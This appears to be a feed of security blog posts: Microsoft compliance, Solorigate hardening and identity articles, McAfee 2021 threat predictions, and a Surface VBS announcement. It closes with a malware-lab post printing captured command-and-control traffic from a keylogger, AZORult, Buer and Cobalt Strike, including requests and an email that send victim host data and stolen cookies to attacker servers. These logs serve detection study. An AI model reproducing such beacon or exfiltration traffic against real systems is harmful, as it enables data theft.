Your compliance score measures your progress towards completing recommended actions that help reduce risks around data protection and regulatory standards. Your initial score is based on the Data Protection Baseline, which includes controls common to many industry regulations and standards. While the Data Protection Baseline is a good starting point for assessing your compliance posture, a compliance score becomes more valuable once you add assessments relevant to the specific requirements of your organization. You can also use filters to view the portion of your compliance score based on criteria that includes one or more solutions, assessments, and regulations. More on that later.

The image below is an example of the Overall compliance score section of the Compliance Manager dashboard. Notice that even though the number under Your points achieved is zero, the Compliance Score is 75 percent. This demonstrates the value of the shared responsibility model. Since Microsoft has already implemented all the actions it is responsible for, a substantial portion of what is recommended to achieve compliance is already complete even though you have yet to take any action.

Shows the Compliance Score from Microsoft Compliance Manager

Figure 3: Compliance Score from Microsoft Compliance Manager

For more information on Microsoft Compliance Manager, please visit the Microsoft Compliance Manager documentation. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Simplify compliance and manage risk with Microsoft Compliance Manager appeared first on Microsoft Security.

Increasing resilience against Solorigate and other sophisticated attacks with Microsoft Defender

­Even as investigations into the sophisticated attack known as Solorigate are still underway, details and insights about the tools, patterns, and methods used by the attackers point to steps that organizations can take to improve their defenses against similar attacks. Solorigate is a cross-domain compromise—comprehensive visibility and coordinated defense are critical in responding to the attack. The same unified end-to-end protection is key to increasing resilience and preventing such attacks.

This blog is a guide for security administrators using Microsoft 365 Defender and Azure Defender to identify and implement security configuration and posture improvements that harden enterprise environments against Solorigate’s attack patterns.

This blog will cover:

The recommendations on this blog are based on our current analysis of the Solorigate attack. While this threat continues to evolve and investigations continue to unearth more information, we’re publishing these recommendations to help customers apply improvements today. To get the latest information and guidance from Microsoft, visit Security operations and incident response teams looking for detection coverage and hunting guidance can refer to

What the Solorigate attack tells us about the state of cyberattacks

Solorigate is a complex, multi-stage attack that involved the use of advanced attacker techniques across multiple environments and multiple domains to compromise high-profile targets. To perpetrate this sophisticated attack, the attackers performed the steps below, which are discussed in detail in this blog:

  1. Compromise a legitimate binary belonging to the SolarWinds Orion Platform through a supply-chain attack
  2. Deploy a backdoor malware on devices using the compromised binary to allow attackers to remotely control affected devices
  3. Use the backdoor access on compromised devices to steal credentials, escalate privileges, and move laterally across on-premises environments to gain the ability to create SAML tokens
  4. Access cloud resources to search for accounts of interest and exfiltrate emails

Diagram of high-level Solorigate attack chain

Figure 1. High-level end-to-end Solorigate attack chain

As its intricate attack chain shows, Solorigate represents a modern cyberattack conducted by highly motivated actors who have demonstrated they won’t spare resources to get to their goal. The collective intelligence about this attack shows that, while hardening individual security domains is important, defending against today’s advanced attacks necessitates a holistic understanding of the relationship between these domains and how a compromise in one environment can be a jump-off point to another.

The Microsoft Defender for Endpoint threat analytics reports published in Microsoft 365 security center enable customers to trace such cross-domain threats by providing end-to-end analysis of critical threats. In the case of Solorigate, Microsoft researchers have so far published two threat analytics reports, which continue to be updated as additional information becomes available:

In addition to providing detailed descriptions of the attack, TTPs, indicators of compromise (IoCs), and the all-up impact of the threat to the organization, the threat analytics reports empower security administrators to review organizational resilience against the attack and apply recommended mitigations. These mitigations and other recommended best practices are discussed in the succeeding sections. Customers who don’t have access to threat analytics can refer to a publicly available customer guidance.

Screenshot of Threat analytics report on Solorigate

Figure 2. Microsoft Defender for Endpoint threat analytics report on Solorigate attack

Protecting devices and servers

The attackers behind Solorigate gain initial access to target networks by activating backdoor codes inserted into the compromised SolarWinds binary. Protecting devices against this stage of the attack can help prevent the more damaging impact of the latter stages.

Ensure full visibility into your device estate by onboarding them to Microsoft Defender for Endpoint

In the ongoing comprehensive research into the complex Solorigate attack, one thing remains certain: full in-depth visibility into your devices is key to gaining insights on security posture, risk, and potential attack activity. Make sure all your devices are protected and monitored by Microsoft Defender for Endpoint.

Screenshot of status tile in device configuration

Figure 3.  Status tile in the Device configuration management tab of Microsoft Defender for Endpoint, showing onboarded devices compared to the total number of devices managed via Endpoint Manager

Identify and patch vulnerable SolarWinds Orion applications

The Solorigate attack uses vulnerable versions of the SolarWinds Orion application so we recommend that you identify devices running vulnerable versions of the application and ensure they are updated to the latest version. The threat analytics report uses insights from threat and vulnerability management to identify such devices. On the Mitigations page in Threat analytics, you can view the number of devices exposed to vulnerability ID TVM-2020-0002, which we added specifically to help with Solorigate investigations:

Screenshot of Microsoft Defender Security Center Threat analytics Mitigations page

Figure 4. The Threat analytics Mitigations page shows information on exposed devices

The new vulnerability ID TVM-2020-0002 was added to the threat and vulnerability management Weaknesses page in Microsoft Defender for Endpoint so you can easily find exposed devices that have vulnerable SolarWinds software components installed. Additional details are available in the vulnerability details pane.

Screenshot of the vulnerability detail for TVM-2020-0002

Figure 5. Threat and vulnerability management vulnerability details pane for TVM-2020-0002  

Customers can also use the software inventory page in threat and vulnerability management to view the SolarWinds Orion versions present on endpoints in your environment and whether the vulnerable versions are present. Links to the threat analytics reports are provided under the Threats column. You can then assess the footprint of a specific software in your organization and identify the impacted devices without the need to run scans across the install base.

Screenshot of threat and vulnerability management software inventory page

Figure 6. Threat and Vulnerability Management software inventory page displaying installed SolarWinds Orion software

Security recommendations are provided to update devices running vulnerable software versions.

Screenshot of threat and vulnerability management security recommendations page

Figure 7. Threat and Vulnerability Management security recommendations page

Security admins can also use advanced hunting to query, refine, and export data. The following query retrieves an inventory of the SolarWinds Orion software in your organization, organized by product name and sorted by the number of devices that have software installed:


| where SoftwareVendor == ‘solarwinds’

| where SoftwareName startswith ‘orion’

| summarize dcount(DeviceName) by SoftwareName

| sort by dcount_DeviceName desc

The following query searches threat and vulnerability management data for SolarWinds Orion software known to be affected by Solorigate:


| where CveId == ‘TVM-2020-0002’

| project DeviceId, DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion

For each security recommendation you can submit a request to the IT administrator to remediate vulnerable devices. Doing this creates a security task in Microsoft Endpoint Manager (formerly Intune) that can be continuously tracked in the threat and vulnerability management Remediation page. To use this capability, you need to enable a Microsoft Endpoint Manager connection.

Screenshot of threat and vulnerability management remediation options

Figure 8. Threat and vulnerability management ‘Remediation options’ for security recommendations and ‘Remediation activities’ tracking

Implement recommended security configurations

In addition to providing vulnerability assessments, Threat and Vulnerability Management also provides security recommendation guidance and device posture assessment that help mitigate this attack. These recommendations use vulnerability data that is also present in the Solorigate threat analytics report.

Screenshot of threat analytics mitigations page

Figure 9. Threat analytics Mitigation page shows secure configuration recommendations for devices exposed to Solorigate

The following security recommendations are provided in response to Solorigate:

Component  Secure configuration recommendations  Attack stage
Security controls (Antivirus) Turn on real-time protection Stage 1
Security controls (Antivirus) Update Microsoft Defender Antivirus definitions to version 1.329.427.0 or later Stage 1
Security controls (Attack surface reduction) Block execution of potentially obfuscated scripts Stage 2
Security controls (Attack surface reduction) Block executable files from running unless they meet a prevalence, age, or trusted list criterion Stage 2
Security controls (Microsoft Defender SmartScreen) Set Microsoft Defender SmartScreen Microsoft Edge site and download checking to block or warn Stage 2

Applying these security controls can be accomplished using Microsoft Endpoint Manager (Intune and Configuration Manager). Refer to the following documentation for guidance on deploying and managing policies with Endpoint Manager:

Protecting on-premises and cloud infrastructure

In addition to compromising client endpoints, attackers can also activate backdoor code via the compromised SolarWinds binary installed on cloud or on-premises servers, allowing them to gain a stronger foothold in the environment.

Protect your on-premises and cloud servers

A large part of many customers’ infrastructure are virtual machines. Azure Defender helps security professionals protect cloud workloads spanning virtual machines, SQL, storage, containers, IoT, Azure network layer, Azure Key Vault, and more.

As mentioned earlier, one of the key actions that should be taken to help prevent Solorigate and similar attacks is to ensure that all devices are protected and monitored by Microsoft Defender for Endpoint. Deploying Azure Defender for Servers enables Defender for Endpoint for your virtual machines to provide comprehensive detection coverage across the Solorigate attack chain. Azure Defender’s integrated vulnerability assessment solution for Azure and hybrid machines can also help address the Solorigate attack by providing visibility into vulnerability assessment findings in Azure Security Center.

Enable additional infrastructure protection and monitoring

To help provide additional in-depth defenses against Solorigate, Azure Defender recently introduced new protection modules for Azure resources. Enabling these protections can improve your visibility into malicious activities and increase the number of Azure resources protected by Azure Defender.

Azure Defender for Resource Manager allows you to continuously monitor all Azure resource management operations and breadth in protection, which includes the ability to detect attempts to exclude known malicious files by the VM Antimalware extension and other suspicious activities that could limit antimalware protection on Azure VMs.

In addition, Azure Defender for DNS ensures that all DNS queries from Azure resources using Azure DNS, including communication with malicious domains used in the Solorigate attack, are monitored, and helps identify Solorigate activity across any of your Azure cloud resources. This helps prevent the malicious Solorigate DLL from being able to connect to a remote network infrastructure to prepare for possible second-stage payloads.

Protect your Active Directory and AD FS infrastructure

After gaining access, attackers may attempt to steal credentials, escalate privileges, and move laterally in the environment. Having complete visibility into your Active Directory, either completely on-premises or hosted in IaaS machines, is key in detecting these attacks and identifying opportunities to harden security posture to prevent them.

In hybrid environments, make sure that Microsoft Defender for Identity sensor components are deployed on all your Domain Controllers and Active Directory Federation Services (AD FS) servers. Microsoft Defender for Identity not only detects malicious attempts to compromise your environment but also builds profiles of your on-premises identities for proactive investigations and provides you with built-in security assessments. We recommend prioritizing the deployment of Microsoft Defender for Identity sensors and using the “Unmonitored domain controllers” security assessment, which lists any detected domain controllers in your environment that are unmonitored. (Note: this capability can monitor your environment only after deploying at least one sensor on a domain controller.)

Screenshot of Microsoft Cloud App security showing unmonitored domain controllers

Figure 10. Unmonitored domain controllers security assessment in the Microsoft Cloud App Security portal

Protecting Microsoft 365 cloud from on-premises attacks

The end goal of the attackers behind Solorigate is to gain access to a target organization’s cloud environment, search for accounts of interest, and exfiltrate emails. From a compromised device, they move laterally across the on-premises environment, stealing credentials and escalating privileges until they can gain the ability to create SAML tokens that they then use to access the cloud environment. Protecting cloud resources from on-premises attack can prevent the attackers from successfully achieving their long game.

Implement recommended security configurations to harden cloud posture

Further best practices and recommendations to reduce the attack surface and protect the cloud from on-premise compromise can be found in our protecting Microsoft 365 cloud from on-premises attacks blog.

Implement conditional access and session control to secure access to cloud resources

In addition to hardening the individual surfaces to disrupt and prevent the attack, extending policies to implement zero trust and access controls is key in preventing compromised or unhealthy devices from accessing corporate assets, as well as governing cloud access from compliant devices.

Enable conditional access policies

Conditional access helps you better protect your users and enterprise information by making sure that only secure users and devices have access. We recommend implementing the common recommended policies for securing access to Microsoft 365 cloud services, including on-premises applications published with Azure Active Directory (Azure AD) Application Proxy.

Additionally, you can configure user risk and device risk conditional access policies to enable access to enterprise information based on the risk level of a user or device, helping keep trusted users on trusted devices using trusted applications.

Enable real-time monitoring and session control

Directly integrated with conditional access, session controls in Microsoft Cloud App Security enable extending access decisions into the session, with real-time monitoring and control over user actions in your sanctioned apps. Implement policies to prevent data exfiltration in risky situations, including blocking or protecting downloads to risky or unmanaged devices, as well as for partner users.

Additional recommendations and best practices

Strengthen your security posture even further by reviewing all improvement actions available via Microsoft Secure Score. Secure Score helps operationalize security posture management and improve your organizational security hygiene for your production tenant. Below are some of the Secure Score improvement actions for Azure Active Directory that have a direct impact against Solorigate attack patterns:

  • Do not allow users to grant consent to unmanaged applications
  • Enable Password Hash Sync if hybrid
  • Enable policy to block legacy authentication
  • Enable self-service password reset
  • Ensure all users can complete multi-factor authentication for secure access
  • Require MFA for administrative roles
  • Turn on sign-in risk policy
  • Turn on user risk policy
  • Use limited administrative roles

In addition, you can use the identity security posture assessment feature in Microsoft Defender for Identity to identify common protection gaps that might exist in your environment. Addressing detection gaps such as the following improves your Microsoft Secure Score and improves your overall resilience to a wide range of credential theft attacks:

  • Stop entities that are exposing credentials in cleartext, including ones that are tagged as sensitive. Attackers listen to cleartext credentials being sent over the network to harvest credentials and escalate privileges. While we have no indication that this technique was used in Solorigate, this is a general attack trend that organizations must be aware of and prevent.

Screenshot of Microsoft Defender for Identity portal showing Identity Security Posture

Figure 11. Entities exposing credentials in clear text security assessment in the Microsoft Cloud App Security portal

  • Remediate accounts with unsecure attributes that could allow attackers to compromise them once an initial foothold in the environment is established.

Screenshot of Microsoft Defender for Identity showing unsecure account attributes

Figure 12. Unsecure account attributes security assessment in the Microsoft Cloud App Security portal

  • Reduce risky lateral movement paths to sensitive users. An attacker could move across devices to elevate to a more privileged role and operate deeper in your organization’s environment, as we’ve witnessed in the Solorigate attack.

Screenshot of Microsoft Defender for Identity portal showing risky lateral movement

Figure 13. Risky lateral movement paths security assessment in the Microsoft Cloud App Security portal

Multiple layers of coordinated defense against advanced cross-domain attacks

Microsoft 365 Defender and Azure Defender deliver unified, intelligent, and automated security across domains to empower organizations to gain end-to-end threat visibility, which as the Solorigate attack has shown, is a critical security capability for all organizations to have. In addition to providing comprehensive visibility and rich investigation tools, Microsoft 365 Defender and Azure Defender help you to continuously improve your security posture as a direct result of insights from collective industry research or your own investigations into attacks through configurations you can make directly in the product or in-product recommendations you can implement.

For additional information and guidance from Microsoft, refer to the following:


The post Increasing resilience against Solorigate and other sophisticated attacks with Microsoft Defender appeared first on Microsoft Security.

Azure Active Directory empowers frontline workers with simplified and secure access

Howdy folks,

The past year has shown us all just how critical frontline workers are to our communities and our economy. They’re the people behind the counter, in the call centers, in hospital ICUs, on the supermarket floor—doing the critical work that makes the difference in feeding our families, caring for the sick, and driving the long-tail economy. Frontline workers account for over 80 percent of the global workforce—two billion people worldwide. Yet because of high scale, rapid turnover, and fragmented processes, frontline workers often lack the tools to make their demanding jobs a little easier.

We believe identity is at the center of digital transformation and the key to democratizing technology for the entire frontline workforce including managers, frontline workers, operations, and IT. This week at the National Retail Federation (NRF) tradeshow, we announced several new features for frontline workers. Building on this announcement, I’m excited to dive into three generally available Azure Active Directory features that empower frontline workers:

1. Streamline common IT tasks with My Staff

Azure Active Directory provides the ability to delegate user management to frontline managers through the My Staff portal, helping save valuable time and reduce security risks. By enabling simplified password resets and phone management directly from the store or factory floor, managers can grant access to employees without routing the request through the helpdesk, IT, or operations.

Delegated user management in the My Staff portal

Figure 1: Delegated user management in the My Staff portal

2. Accelerate onboarding with simplified authentication

My Staff also enables frontline managers to register their team members’ phone numbers for SMS sign-in. In many verticals, frontline workers maintain a local username and password—a cumbersome, expensive, and error-prone solution. When IT enables authentication using SMS sign-in, frontline workers can log in with single sign-on (SSO) for Microsoft Teams and other apps using just their phone number and a one-time passcode (OTP) sent via SMS. This makes signing in for frontline workers simple and secure, delivering quick access to the apps they need most.

Showing SMS sign-in on two devices

Figure 2: SMS sign-in

Additional layers of Conditional Access enable you to control who is signing in using SMS, allowing for a balance of security and ease of use.

3. Improve security for shared devices

Many companies use shared devices so frontline workers can do inventory management and point-of-sale transactions—without the IT burden of provisioning and tracking individual devices. With shared device sign out, it’s easy for a firstline worker to securely sign out of all apps and web browsers on any shared device before handing it back to a hub or passing it off to a teammate on the next shift. You can choose to integrate this capability into all your line-of-business iOS and Android apps using the Microsoft Authentication Library.

Shared device sign-out screen

Figure 3: Shared device sign-out screen

Additionally, you can use Microsoft Endpoint Manager to set up and customize how frontline workers use shared devices, with three new preview features for provisioning, setting up device-based Conditional Access policies, and customizing the sign-in experience with Managed Home Screen.

Looking ahead

Working in partnership with our customers, we’re committed to bringing you purpose-built frontline capabilities that deliver secure identity and access that is tailored to your needs and environment. We’ll continue to innovate in 2021, adding features that simplify work, bring people together, and help organizations of all sizes achieve more.

To learn more about Microsoft Identity solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @AzureAD and @MSFTSecurity for the latest news and updates on cybersecurity.

The post Azure Active Directory empowers frontline workers with simplified and secure access appeared first on Microsoft Security.

Top Security Threats to Look Out for in 2021

Top Cyber Security Threats to Look Out for in 2021

2020 was unexpectedly  defined by a global pandemic. Throughout the year, we have all had to figure out how to best live our lives online – from working from home to distance learning to digitally connecting with loved ones.  As 2020 comes to a close, we must ask: will this new normal continue into 2021, and how will it affect how we connect – both with each other and with our online world?

McAfee assessed the cybersecurity landscape as we head into the New Year, highlighting the key takeaways we should keep in mind to help protect our digital lives:

Hacking the Home

Home is a safe space – or is it? With more consumers living and working from home, we have seen an increase in connected devices within the home. In fact, since the onset of the coronavirus pandemic, McAfee Secure Home Platform device monitoring shows a 22% increase in the number of connected home devices globally and a 60% increase in the U.S. These trends are also carrying over into mobile shopping habits. Almost 80% of shoppers have found themselves using their IoT devices to make more purchases since the beginning of the pandemic. The evolving world of the connected lifestyle gives hackers more potential entry points to homes and consumers information- through devices, apps and web services- and in 2021, we will be monitoring how this trend evolves.

With more of us working remotely, distance learning, and seeking online entertainment, cybercriminals will look to exploit our vulnerabilities. For example, remote employees are more likely to use personal devices while working and log onto home networks that are not fully secured. What’s more, many of the systems behind consumer networks have not had their passwords changed from the default settings since it was first introduced into the home . If a criminal can use the default credentials to hack the consumer’s network infrastructure, they may also gain access to other network devices – whether they are used for school, work, or leisure.

New Mobile Payment Scams

Touchless solutions for payments are becoming more popular as we all navigate the curveballs of COVID-19. Mobile payment apps provide the convenience of both paying for services and receiving payments without the hazards of touching cases or credit and debit cards.  However, fraudsters are also following the money to mobile, as research by RSA’s Fraud and Risk Intelligence team shows that 72% of cyber fraud activity involved mobile in the fourth quarter of 2019. McAfee predicts an increase in “receive”-based exploits in 2021, since they provide a quick and easily entry for fraudsters to scam unsuspicious consumers by combining phishing with payment URLs.

Imagine receiving an email stating that you’re receiving a refund for a concert that was canceled due to COVID-19. The email instructs you to click on the URL in the next message, fill in your bank information, and “accept the refund.” But instead of getting your money back, you find that you’ve handed over your financial data to scammers. As we continue to adopt mobile payment methods in 2021, it’s important to remember that hackers will likely take advantage of these convenient touchless systems.

 “Qshing” or QR Code Abuse

With the pandemic, more industries have QR codes to make our lives easier- with Statista reporting that over 11 million US households are expected to scan QR codes by 2020.  From restaurants to personal care salons to fitness studies, QR codes help limit direct contact with consumers – you easily scan the code, see services/items offered, and select and purchase your desired items. But do you stop and think about how this might be putting your personal data at risk? As it turns out, QR codes provide scammers with a new avenue for disguising themselves as legitimate businesses and spreading malicious links.

Scammers are quick to exploit popular or new technology for their malicious tricks, and QR codes are no different. In fact, McAfee predicts that hackers will find opportunities to use social engineering to gain access to our personal data in a single scan. Take restaurant owners looking to make QR codes that give us quick access to their menus. Knowing that these business owners are looking to download apps that generate QR codes, bad actors are predicted to entice them into downloading malicious apps that pretend to do the same.

But instead of generating a code, the app will steal the owner’s data, which scammers could then use to trick loyal diners like you and me. Once a hacker gains access to the restaurant’s customer database, they can use this information to launch phishing scams under the guise of our favorite local eateries.

Stay Secure in 2021 and Beyond

To help ensure that you are one step ahead of cybercriminals in the upcoming year, make a resolution to adopt the following online security practices and help protect your digital life:

Be cautious of emails asking you to act 

If you receive an email, call, or text asking you to download software, app, or pay a certain amount of money, do not click or take any direct action from the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links or forking over money unnecessarily.

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without clicking. This will allow you to see a link preview and check for any typos or grammatical errors – both of which are typical signs of a phishing link. If the URL looks suspicious, don’t interact with it and delete the message altogether.

Use strong, unique passwords

When setting up a new IoT device, network, or online account, always change the default credentials to a password or passphrase that is strong and unique. Using different passwords or passphrases for each of your online accounts helps protect the majority of your data if one of your accounts becomes vulnerable.

Browse with caution

Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



The post Top Security Threats to Look Out for in 2021 appeared first on McAfee Blogs.

Network equipment maker Ubiquity urges admins to change passwords after third-party hack

Administrators with network equipment from manufacturer Ubiquiti are being urged to change their passwords and enable two-factor authentication after the company acknowledged a hack at a third-party may endanger access.

The post Network equipment maker Ubiquity urges admins to change passwords after third-party hack first appeared on IT World Canada.

New Surface PCs enable virtualization-based security (VBS) by default to empower customers to do more, securely

VBS and HVCI-enabled devices help protect from advanced attacks

Escalation of privilege attacks are a malicious actor’s best friend, and they often target sensitive information stored in memory. These kinds of attacks can turn a minor user mode compromise into a full compromise of your OS and device. To combat these kinds of attacks, Microsoft developed virtualization-based security (VBS) and Hypervisor-protected code integrity (HVCI, also commonly referred to as memory integrity). VBS and HVCI use the power of hardware capabilities like virtualization to provide better protection against common and sophisticated malware by performing sensitive security operations in an isolated environment.

Today, Microsoft announced that the new Surface Pro 7+ for Business will ship with these Windows enhanced hardware security features enabled out of the box to give customers even stronger security that is built-in and turned on by default. The Surface Pro 7+ for Business joins existing recently shipped devices like the Surface Book 3, Surface Laptop Go, and the Surface Pro X in enabling VBS and HVCI by default.

Surface enables added security features by default to combat common threats

Surface devices are used by customers across a variety of mission critical scenarios – from collaborating in Office on important documents to Microsoft Teams calls with coworkers across the globe. Providing robust protection against the latest malware and ransomware is a critical goal for Surface as customers expect that their devices and data can withstand common attacks. To meet this customer need, Surface has worked diligently across multiple hardware platforms to enable VBS and HVCI by default on capable new Surface models, including the Surface Book 3 and Surface Laptop Go, to provide the latest security protections consistently across different form factors and price points available to customers.

VBS and HVCI create and isolate a region of memory from the normal operating system using hardware virtualization capabilities. This security capability can stop most escalation of privilege attacks. The security subsystems running in the isolated environment provided by the hypervisor can help enforce HVCI protections, including preventing kernel memory pages from being both writeable and executable.

VBS provides significant security gains against practical attacks including several we saw last year, including human-operated ransomware attacks like RobbinHood and sophisticated malware attacks like Trickbot, which employ kernel drivers and techniques that can be mitigated by HVCI. Our research shows that there were 60% fewer active malware reports from machines reporting detections to Microsoft 365 Defender with HVCI enabled compared to systems without HVCI.  The Surface Book 3 shipped in May 2020 and the Surface Laptop Go shipped in October 2020, and users may not have noticed they are running VBS and are therefore better protected based on the work done under the hood.

The simple choice for device security

Endpoint security has always been at the core of Surface devices. Our engineering team has been using a unified approach to firmware protection and device security since 2015 through complete end-to-end ownership of hardware design, in-house firmware development, and a holistic approach to device updates and management.

For Surface, our Unified Extensible Firmware Interface (UEFI) is written in-house, continuously maintained through Windows Update, and fully managed through the cloud by Microsoft Endpoint Manager. This level of control enables enterprises to minimize risk and maximize control at the firmware level before the device even starts Windows 10. IT organizations now have the ability through the cloud to disable a camera or disable the ability to boot from USB all at the pre-boot firmware level. The result is a reduced attack vector that is critical to endpoint protection. Microsoft is making this UEFI* available broadly via open source through Project Mu on GitHub.

To protect the firmware and initial boot of your device, Surface enables Secure boot to ensure an authentic version of Windows 10 is started and make certain the firmware is as genuine as it was when it left the factory. Surface also ensures that each commercial device includes a security processor (TPM 2.0) to provide advanced encryption capabilities such as BitLocker to secure and encrypt your data and Windows Hello to enable passwordless sign-in. Each of these built-in security options helps protect your device from malicious software attacks.

With the necessary hardware and OS settings configured during manufacturing, the simple choice for customers looking for devices with advanced Windows security enabled is a Windows PC. Today, the Surface Pro 7 + for Business, Surface Book 3, Surface Laptop Go, and Surface Pro X already ship with VBS and HVCI enabled by default. Future Surface models on capable silicon will ship with these capabilities also enabled by default. Most recent Surface devices and Windows PCs from many other OEMs that have virtualization support are also capable of using these features. Customers can turn on the Memory integrity feature in the device security settings, which also automatically checks if devices are capable.

The post New Surface PCs enable virtualization-based security (VBS) by default to empower customers to do more, securely appeared first on Microsoft Security.

C2 Traffic Patterns: Personal Notes

Detection is a key point in threat hunting. During the past few weeks, stright in the middle of the winter “holidays” (well, maybe if you live in a place where no COVID-19 lockdown was involved), many people re/started a studying program on cybersecurity. Some of them wrote to me asking if there is a way to detect common malware infections through network traces. So I thought it was a nice idea to share some personal and quick notes on that topic.

BTW The short answer is: Yes there is a way. So it makes sense to trace Malware traffics for studying purposes, but also to find patterns for network detections in real environments.

First of all you need to build your own laboratory, you might decide to build a dual VM systems, in which VM1 is the victim machine and VM2 is the traffic sniffer or you might decide to have a single victim machine and the main host sniffing and analyzing traffic streams. This is actually my favourite choice: a single MV called “victim” where I detonate malwares and the main host (the real machine in which the victim is virtualized) where the traffic tools are run. You need to create a certificate and manke it trusted from the victim machine in order to facilitate the SSL inspection. But this is not a post on how to build your own laboratory, if you are interested on building your own Malware laboratory the following 2 links are great starting points:

  • Christophe wrote a very nice starting post on it: HERE
  • Byte-Atlas followed on the topic showung how to harden the machine to reduce Malware Evasion: HERE

After you set up your own laboratory you are ready to start your tracking process. Following some personal notes on my “network traceing days”. Please note the following collection is a mix-up of personal traced network traffic (and already published on gists/reports/repositories/pastebins etc) and the one I found from different friends/posts/reports/repositories as well during the past years.

Traffic Patterns

The following paragraphs describe traffic traces captured by executing in a controlled environment some of the most known malware untill now. Please note that I’ve taken descriptions from Malpedia for reading convenience.


A .NET based keylogger and RAT. Logs keystrokes and the host’s clipboard, it finally beacons this information back to the C2. It has a modular infrastructure, following some of the traffic grabs for the following modules:


POST /zin/WebPanel/api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv: Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Content-Length: 308
Expect: 100-continue
Connection: Keep-Alive

HTTP/1.1 100 Continue



<html>Time: 11/25/2019 17:48:57<br>User Name: admin<br>Computer Name: VICTIM-PC<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz<br>RAM: 4095.61 MB<br><hr>URL:<br><br>


From: office@xxx.]com
To: officelogs@xxx[.]com
Date: 12 Oct 2019 17:58:19 +0100
Subject: admin/VICTIM-PC Recovered Cookies
Content-Type: multipart/mixed;

Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Time: 10/12/2019 11:58:13<br>UserName: admin<br>ComputerName: VICTI=
M-PC<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Int=
el(R) Core(TM) i5-6400 CPU @ 2.70GHz<br>RAM: 3583.61 MB<br>IP: 18=<hr>


AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit. The following network trace is of one of the most relevant POST action taking back pattern with many “/”

POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 103
Cache-Control: no-cache


Buer Loader

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.


Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Nov 2019 20:00:24 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive


Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Nov 2019 20:00:24 GMT
Content-Type: application/*
Content-Length: 2109952
Connection: keep-alive
Last-Modified: Tue, 12 Nov 2019 19:32:38 GMT
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3
Content-Length: 1046


Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named ‘Beacon’ on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

Following a general profile

GET /Mdt7 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; NP06)
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2019 02:13:32 GMT
Content-Type: application/octet-stream
Content-Length: 213589


GET /push HTTP/1.1
Accept: */*
Cookie: TwJl1o2Nzk3+xmC39FsNTbyJPGHyNxllFZ8wZUwR831SYmTwrxoGydXQGF1ej89K1t0rTLgzjd95c8127hlZ6SQ4hx95YrYuRHooitXYGEAxtbKv53LJ6K+6r1y1OQU3n0+O93xxPiyx6RvPeKzlACbO4nEc5YKzh0vAfWJvlm0=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2019 02:017:31 GMT
Content-Type: application/octet-stream
Content-Length: 0

Following Amazon C2 profile (from external sources)

GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1
Accept: */*
Cookie: skin=noskin;session-token=MM4bZQ5WUPUrn7TPQuCWct6G+WGXZaLdezMQVEv8PHnB7tnvTk7ct3W71pQmn2NMJQD7IFbjPnKJV27tKshA8AjgzpXoeUtOIrDiBEg0x3AesYq52s74IbjnsVA+wASo0D6L23fd87XNDUiBro5wNBzcybUOADAO1fjCobw5MAw=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 13 Dec 2019 17:48:39 GMT
Server: Server
